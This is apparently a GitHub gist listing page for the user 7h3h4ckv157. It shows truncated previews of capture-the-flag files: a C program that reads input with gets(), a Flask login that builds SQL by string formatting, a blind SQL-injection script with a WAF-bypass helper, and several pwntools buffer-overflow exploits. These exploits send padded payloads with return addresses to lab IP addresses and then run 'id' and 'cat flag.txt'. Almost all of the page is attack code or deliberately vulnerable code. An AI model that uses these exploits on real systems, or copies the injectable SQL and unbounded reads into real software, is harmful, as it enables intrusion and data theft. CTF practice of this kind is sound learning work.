7h3h4ckv157 7h3h4ckv157
π©βπ»
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| void overflow() { | |
| char buffer[64]; | |
| printf("try your best\n"); | |
| gets(buffer); | |
| } | |
| int main() { |
7h3h4ckv157
/ exploit.py
Created
November 20, 2021 07:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env/python2 | |
| # Author : 7h3h4ckv157 | |
| # https://github.com/7h3h4ckv157 | |
| # https://twitter.com/7h3h4ckv157 | |
| from pwn import * | |
| p = process('./ret2libc') |
7h3h4ckv157
/ server.py
Created
January 24, 2022 15:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import flask | |
| import psycopg2 | |
| import datetime | |
| import hashlib | |
| from skynet import Skynet | |
| app = flask.Flask(__name__, static_url_path='') | |
| skynet = Skynet() |
7h3h4ckv157
/ .py
Created
January 24, 2022 15:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def query_login_attempt(): | |
| username = flask.request.form.get('username', '') | |
| password = flask.request.form.get('password', '') | |
| if not username and not password: | |
| return False | |
| sql = ("SELECT id, account" | |
| " FROM target_credentials" | |
| " WHERE password = '{}'").format(hashlib.md5(password.encode()).hexdigest()) | |
| user = sql_exec(sql) |
7h3h4ckv157
/ bug.py
Created
January 24, 2022 15:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def query_login_attempt(): | |
| username = flask.request.form.get('username', '') | |
| password = flask.request.form.get('password', '') | |
| if not username and not password: | |
| return False | |
| sql = ("SELECT id, account" | |
| " FROM target_credentials" | |
| " WHERE password = '{}'").format(hashlib.md5(password.encode()).hexdigest()) | |
| user = sql_exec(sql) |
7h3h4ckv157
/ exploit.py
Created
January 24, 2022 19:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import string | |
| TIMEOUT = 10 | |
| def waf_bypass(payload): | |
| return "||".join([f"'{c}'" for c in payload]) | |
| def peek(substring): |
7h3h4ckv157
/ exploit.py
Created
May 2, 2022 20:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| payload = b"A"*60 | |
| connect = remote('10.10.27.163', '9001') | |
| connect.sendline(payload) | |
| connect.sendline('id') | |
| connect.sendline('cat flag.txt') |
7h3h4ckv157
/ exploit.py
Created
May 9, 2022 16:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| connect = remote('10.10.205.35', '9002') | |
| payload = b"A"*104 + p32(0xc0d3) + p32(0xc0ff33) | |
| connect.recv() | |
| connect.sendline(payload) | |
| connect.sendline('id');connect.sendline('cat flag.txt') | |
| connect.interactive() |
7h3h4ckv157
/ local.py
Created
May 10, 2022 16:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| p = process("./pwn103.pwn103") | |
| payload = b"A"*40 + p64(0x00401554) | |
| p.sendline(b"3") | |
| p.recv() | |
| p.sendline(payload) |
7h3h4ckv157
/ exploit.py
Created
May 10, 2022 17:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| p = remote("10.10.229.12","9003") | |
| payload = b"A"*40 + p64(0x00401554) + p64(0x00401554) | |
| p.sendline(b"3") | |
| p.recv() | |
| p.sendline(payload) | |
| p.recv() |
OlderNewer